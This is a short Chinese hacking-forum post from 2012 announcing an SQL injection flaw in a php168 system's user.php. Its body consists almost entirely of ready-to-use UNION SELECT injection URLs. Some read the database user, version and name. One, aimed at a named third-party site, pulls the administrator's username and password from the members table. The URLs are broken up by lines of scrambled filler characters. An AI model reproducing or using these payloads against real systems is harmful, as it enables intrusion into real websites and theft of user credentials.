找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2966|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
& W0 [% X+ z: B# ^9 x! p0 I( l1 G& C                                                         
1 N3 ^! d3 }% O& z, t                                       
3 G# z, Z6 H' G; Z6 \# w/ o% Q3 D& w+ M$ w3 ]
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
0 T9 B& ^  ]! r# o" F                                                     
4 N4 [) E3 a& n* H! I                                                                   . ?, k$ A) s# q8 U" k/ |
                                                        2 d6 N. B0 M$ p% \6 ^
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--  ]) @8 p5 E) t" J! _2 T5 A

* Q; O6 E7 H& e6 @. e4 \& R  ~( m: @* D: G) P2 S: `

  F! G: i1 [/ o' H: T                                                            
/ J7 p+ v' e. w
" ~9 n$ T( }2 i9 q9 J6 Phttp://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--% T% p! {5 m; o4 X9 g' Y( q1 t# R* Y4 @

0 o" O, }) |; u3 r# \& t! a( p6 k% |  ^, P" L$ G; x
2 Z/ q) h1 L, u2 y% W  P
                                                                    
1 L  D: h, @% |

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表